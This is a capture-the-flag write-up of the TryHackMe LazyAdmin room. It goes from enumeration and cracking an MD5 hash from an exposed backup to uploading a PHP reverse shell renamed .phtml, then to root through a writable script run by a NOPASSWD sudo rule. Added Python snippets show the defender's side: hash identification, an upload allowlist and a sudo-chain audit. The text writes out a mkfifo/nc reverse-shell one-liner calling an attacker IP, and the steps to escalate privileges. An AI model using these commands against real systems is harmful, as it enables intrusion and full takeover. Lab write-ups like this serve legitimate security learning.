TryHackMe — LazyAdmin Write Up

Taylor Jackson
8 min read · Apr 14, 2021

A little transparency here: I had to get some small hints from another write-up to be able to complete this room. But I only went to it when I was really stuck, and the hints were really just to get me on the right track; I figured it out from there. I will be sure to note when I looked at a write-up in my own write-up.

This is the first write-up I have done for a lab/CTF, but I am excited to jump in. I figured it would be best to start out with a beginner-level CTF, and I love the CTFs that https://tryhackme.com/ has. Let me know if you have any feedback after going through this if you follow along with it!

Step 1: Enumeration

First, let's start with an nmap scan of the target IP address.

I used sudo nmap -sS -sV -A -O -p 1-30000 10.10.52.60 [I generally use -p- on my scans, but it was going to take a little longer than expected, so I figured that since this is a beginner-level CTF, it would be unlikely that there is a service running on a port higher than 30000]

After the scan finishes, we see that there are two services listening on this machine: tcp/22 [SSH] and tcp/80 [HTTP].

Since we don't have much information to go on for the SSH service, let's look at the website on port 80. Go to your web browser and type in your target IP, which is 10.10.52.60 for me.

It looks like it's just a default Apache page, so not much to go on yet. If we explore this page and look at the HTML source, we don't really get much either.

The next step is to do some directory fuzzing of this web server and see if we find anything interesting. I like to use DirBuster because of its user interface. You can also just use dirb http://VICTIMIP from the command line.

Pull up DirBuster and type in the URL of your target machine. Then tell it to go faster by using more threads, and point it at the common.txt wordlist under /usr/share/wordlists/dirb/common.txt.

This scan gives us some interesting directories to explore on this webpage.

The first one that looks useful is /content/as/. If we go to that page, it's a login page for a service called SweetRice!

The first thing I did was look at the HTML source of this page, but I struggled to find anything. I also tried brute-forcing this login page with Burp Suite using admin as the user, but that didn't get me any results. I then went back to the results I got from the DirBuster scan and found another directory that was interesting: /content/inc/

This gives us a lot of files. The most interesting folder here, though, is mysql_backup/. Maybe it could have some usernames or passwords?

If we go to this directory, we find a MySQL backup file that we can download and open on our own machine. I used Mousepad to open it and searched through its contents. Partway through the search I found this string of numbers that I thought must be a password hash.

At this point I looked at a write-up because I couldn't figure out if this was actually what I needed to be looking at. It turns out it was, but it's an MD5 hash; I was trying to decode it with Base64 (looks like I don't know hashes well enough to discern their types just by looking at them, haha).

Once I figured out it was MD5, I stepped away from that write-up and went back to my own ways. If you plug the hash into an MD5 cracker like https://crackstation.net/, it'll give you a password!
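The detour through Base64 is a common one, so here is an added example (my code, not part of the original write-up) that classifies a stored credential by its shape alone, and then shows why an unsalted MD5 found in a leaked backup falls to a lookup site like CrackStation while a salted, slow hash does not. Every digest and label in it is constructed for the example; none of them is the hash from this box.

```python
import hashlib
import os
import re

# Hex digest lengths of the common unsalted, fast hash functions.
HEX_DIGEST_NAMES = {32: "MD5 (or NTLM)", 40: "SHA-1", 64: "SHA-256", 128: "SHA-512"}

# Modular-crypt prefixes used by /etc/shadow and most password libraries.
CRYPT_PREFIXES = {
    "$1$": "md5crypt", "$5$": "sha256crypt", "$6$": "sha512crypt",
    "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
    "$y$": "yescrypt", "$argon2i$": "argon2i", "$argon2id$": "argon2id",
}


def guess_hash_format(value):
    """Classify a stored credential string by its shape alone.

    Returns a label such as 'MD5 (or NTLM)', 'sha512crypt' or
    'base64 (encoding, not a hash)'; 'unknown' if nothing matches."""
    v = value.strip()
    for prefix, name in CRYPT_PREFIXES.items():
        if v.startswith(prefix):
            return name
    if re.fullmatch(r"[0-9a-fA-F]+", v) and len(v) in HEX_DIGEST_NAMES:
        return HEX_DIGEST_NAMES[len(v)]
    # Base64 uses letters beyond a-f, '+', '/' and '=' padding; it encodes, it does not hash.
    if re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", v) and len(v) % 4 == 0:
        return "base64 (encoding, not a hash)"
    return "unknown"


def unsalted_md5(password):
    """The storage format found in the backup on this box: one deterministic digest."""
    return hashlib.md5(password.encode()).hexdigest()


def salted_slow_hash(password, salt=None, iterations=200_000):
    """A defensible alternative: random 16-byte salt plus PBKDF2-HMAC-SHA256.

    The iteration count is kept modest for the example; raise it in production."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"{salt.hex()}${iterations}${dk.hex()}"


def verify_salted(password, stored):
    """Recompute with the stored salt and iteration count, then compare."""
    salt_hex, iterations, _ = stored.split("$")
    return salted_slow_hash(password, bytes.fromhex(salt_hex), int(iterations)) == stored


def salted_roundtrip(password, wrong):
    """(correct password verifies, wrong password verifies) for a fresh salted hash."""
    stored = salted_slow_hash(password)
    return verify_salted(password, stored), verify_salted(wrong, stored)


def lookup_table_works(password):
    """Two accounts with the same password: identical under MD5 (so one precomputed
    table answers for every user), different under the salted scheme."""
    md5_same = unsalted_md5(password) == unsalted_md5(password)
    salted_same = salted_slow_hash(password) == salted_slow_hash(password)
    return md5_same, salted_same
```

The length-and-charset heuristic is only a first cut (a 32-hex string could equally be an NTLM hash or a random token), but it is enough to stop you feeding a hex digest to a Base64 decoder. The second half is the defender's lesson from this box: the backup leaked, and because the hashes were unsalted MD5 a free lookup table turned them straight into passwords.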

Step 2: Getting Access

Once I had a password, I went back to that SweetRice! login page at /content/as and tried admin as the user with the password I got. It didn't work, so I went back to the MySQL backup file and noticed a listing for manager, which I thought might be the login user instead. And sure enough, it worked!

Now let's see what we can do to get access to this machine. The first thing I can think of is getting a reverse shell somehow. I did some clicking around and searching and found that the Media Center lets you upload files to the site that you can then navigate to. This means we can get a reverse shell from here!

What I'm going to try first is a PHP reverse shell. You can download the code for that from https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

You just need to make sure you tweak two values inside the file before you upload it:

$ip = '127.0.0.1';
$port = 1234;

Set the IP to your attacking machine's IP address and the port to whatever you want to listen on. I usually use 4444 as my listening port for a reverse shell. We can then run nc -lvp 4444 in the command line to start listening on that port.

Once you've tweaked those values, you can try to upload the file to that Media Center page. When I did it at first it didn't work. Hmm... it must be blacklisting .php files. So the other option is to try changing the extension to something different. Let's try .phtml instead and see if that works; if it does, it'll still be the same PHP reverse shell. Sure enough, it does!
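Why did swapping .php for .phtml get past the filter? The upload check was a blacklist of extensions, and a blacklist only stops the names its author thought of. As an added example (my code, not from the write-up or from SweetRice), here are the two checks side by side in Python, plus the server-chosen filename a hardened upload handler would store instead of trusting the user's name. Both extension lists are constructed for the example.

```python
import secrets
from pathlib import Path

# Extensions the upload handler on this box appears to reject (constructed for the example).
BLACKLIST = {".php"}

# Allowlist for a media library: only the formats the site actually needs to serve.
ALLOWED = {".jpg", ".jpeg", ".png", ".gif", ".mp4"}


def blacklist_accepts(filename):
    """Deny-list check, as the Media Center seems to do: anything not named is allowed."""
    return Path(filename).suffix.lower() not in BLACKLIST


def allowlist_accepts(filename):
    """Allow-list check: exactly one extension, and it must be on the list.

    Looking at every suffix (not just the last) also rejects 'shell.php.jpg',
    which some web server handler configurations would still treat as PHP."""
    suffixes = [s.lower() for s in Path(filename).suffixes]
    return len(suffixes) == 1 and suffixes[0] in ALLOWED


def stored_name(filename):
    """Name the file on disk ourselves so user input chooses neither path nor extension.

    Raises ValueError for anything the allowlist rejects."""
    if not allowlist_accepts(filename):
        raise ValueError(f"upload rejected: {filename!r}")
    return secrets.token_hex(16) + Path(filename).suffix.lower()


def compare(filenames):
    """Side-by-side verdicts (blacklist, allowlist) for a list of candidate upload names."""
    return {name: (blacklist_accepts(name), allowlist_accepts(name)) for name in filenames}
```

Even with the allowlist, the upload directory should be served as static content with script execution disabled, so that a file which slips through is downloaded rather than run.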

Again, just make sure you're listening on port 4444 with nc -lvp 4444, then click on the file in Media Center to navigate to it. And sure enough, we get a reverse shell!

This shell looks a little unstable, so let's make it more stable with python3 -c 'import pty; pty.spawn("/bin/bash")' [learned this from the Complete Beginner learning path on TryHackMe and the eJPT material on INE]. We can then see where we are with ls -al and navigate from there. Eventually you'll find the home folder; navigate to /home/itguy and that is where our first flag, user.txt, is!

Open that with cat and plug the value into TryHackMe!

Step 3: Privilege Escalation

Now that we have access to the machine and have our user flag, we need root privileges to get the root.txt flag!

I first tried looking at the SUID binaries with find / -perm -u=s -type f 2>/dev/null and checked GTFOBins to see if any of them were listed for SUID, but unfortunately there wasn't anything.

The next thing I tried was sudo -l, which lists the commands the current user can run with sudo, including any that don't need a password. And sure enough, it gives us something to look into.

This is interesting: (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl

The first thing I decided to do was open backup.pl with cat, and we get this.

The first thing to know is that .pl is a Perl script. I had to look this up because I haven't become familiar with Perl yet, mainly just Python (.py) so far. Basically, this Perl script executes a copy.sh file in /etc/, so let's go look at that file.

Okay, this is interesting. We get rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f

I honestly wasn't quite sure what this was yet. I knew this was a lead and that it had to get us root access somehow, but I didn't know how. I did some more poking around and even tried to get linpeas.sh onto the machine by running a Python HTTP server on my attack machine, but the permissions on the victim machine wouldn't let me write it there. I reached a point where I was stuck, so I decided to take a peek at the same write-up I used earlier to get some hints.

What I discovered was that the command in copy.sh is another reverse shell, and that copy.sh is writable by our user, so we can change it. Since copy.sh is executed by a file (backup.pl) that can be run with sudo without a password, that means we can get it run as root and get a root reverse shell.

We first need to change the IP address in that command to our own attacker machine's:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.6.71.50 5554 >/tmp/f

Now that it's changed, we can stay in the /etc/ directory and write this command into copy.sh with:

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.6.71.50 5554 >/tmp/f" > copy.sh

[The quotes are important here so that the shell passes the whole command to echo as a single string instead of acting on the ; | and > characters itself]

Now we can go back to /home/itguy and execute backup.pl with sudo.

A note here: you have to type in sudo /usr/bin/perl /home/itguy/backup.pl and not just sudo perl backup.pl in order for it to work, because the sudoers rule only matches that exact command line. I learned this through many failed attempts of it asking me for the sudo password again and again, haha.

Make sure that you have a separate terminal window open with nc -lvp 5554 to catch the reverse shell. Then we can run sudo /usr/bin/perl /home/itguy/backup.pl and, sure enough, we get our reverse shell as root!

Now we can navigate to the root folder with cd /root and get the root.txt flag!
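The root cause of this escalation is a sudo rule that runs a root-owned script which in turn runs a file any user can edit, so the NOPASSWD rule is only as safe as the least-protected file on that chain. As an added example (my code, not from the write-up), here is a small Python audit that takes a sudoers NOPASSWD line, follows the absolute paths from the command into the scripts it references, and reports any file on the chain that a non-root user could modify. The demo() fixture is constructed in a temporary directory to mirror the backup.pl and copy.sh shape from this box; the trusted_uids parameter is my own addition, so the fixture's owner can stand in for root.

```python
import os
import re
import stat
import tempfile

NOPASSWD_RE = re.compile(r"\(\s*([^)]+?)\s*\)\s*NOPASSWD:\s*(.+)")
ABS_PATH_RE = re.compile(r"/[A-Za-z0-9_./-]+")


def parse_nopasswd(rule):
    """Split '(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl' into
    ('ALL', ['/usr/bin/perl', '/home/itguy/backup.pl']); None if not a NOPASSWD rule."""
    m = NOPASSWD_RE.search(rule)
    if not m:
        return None
    return m.group(1), m.group(2).split()


def referenced_paths(text):
    """Absolute paths mentioned in a script body: the files it may execute or read."""
    return sorted(set(ABS_PATH_RE.findall(text)))


def is_binary(path):
    """Compiled programs are checked for permissions but not followed for more paths."""
    with open(path, "rb") as fh:
        return b"\x00" in fh.read(1024)


def modifiable_by_untrusted(path, trusted_uids):
    """True if someone outside trusted_uids could change the file: owner not trusted,
    group-writable with a non-root group, or world-writable."""
    st = os.stat(path)
    if st.st_uid not in trusted_uids:
        return True
    if st.st_mode & stat.S_IWGRP and st.st_gid != 0:
        return True
    return bool(st.st_mode & stat.S_IWOTH)


def audit_rule(rule, trusted_uids=frozenset({0})):
    """Follow the command in a NOPASSWD rule into the scripts it references and
    return every file on that chain that an untrusted user could modify."""
    parsed = parse_nopasswd(rule)
    if parsed is None:
        return []
    _, argv = parsed
    pending = [a for a in argv if a.startswith("/")]
    seen, findings = set(), []
    while pending:
        path = pending.pop()
        if path in seen or not os.path.isfile(path):
            continue
        seen.add(path)
        try:
            if modifiable_by_untrusted(path, trusted_uids):
                findings.append(path)
            if not is_binary(path):
                with open(path, "r", errors="ignore") as fh:
                    pending.extend(referenced_paths(fh.read()))
        except OSError:
            continue
    return sorted(findings)


def demo(world_writable=True):
    """Constructed fixture with the shape of the rule on this box: a NOPASSWD Perl
    script that runs a shell script stored elsewhere. Returns the audit findings."""
    tmp = tempfile.mkdtemp()
    script = os.path.join(tmp, "backup.pl")
    helper = os.path.join(tmp, "copy.sh")
    with open(helper, "w") as fh:
        fh.write("#!/bin/sh\ntar czf /var/backups/site.tgz /var/www/html\n")
    with open(script, "w") as fh:
        fh.write(f'#!/usr/bin/perl\nsystem("/bin/sh", "{helper}");\n')
    os.chmod(script, 0o755)
    os.chmod(helper, 0o777 if world_writable else 0o755)
    rule = f"(ALL) NOPASSWD: /usr/bin/perl {script}"
    # The fixture files belong to whoever runs this, so that uid stands in for root here.
    return audit_rule(rule, trusted_uids=frozenset({0, os.getuid()}))
```

With copy.sh at mode 777 the audit names it; at 755 and root-owned it reports nothing, which is the fix for this box: keep every file on a sudo command's chain root-owned and unwritable by others, or drop the NOPASSWD rule altogether. The path regex is deliberately simple and will miss paths built at runtime, so treat a clean result as a first pass rather than proof.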

And that's the end of this lab! Thank you to those of you who have read through this!

If you have any feedback to give or would just like to reach out in general you can contact me at tjackson.video@gmail.com

Thank you!
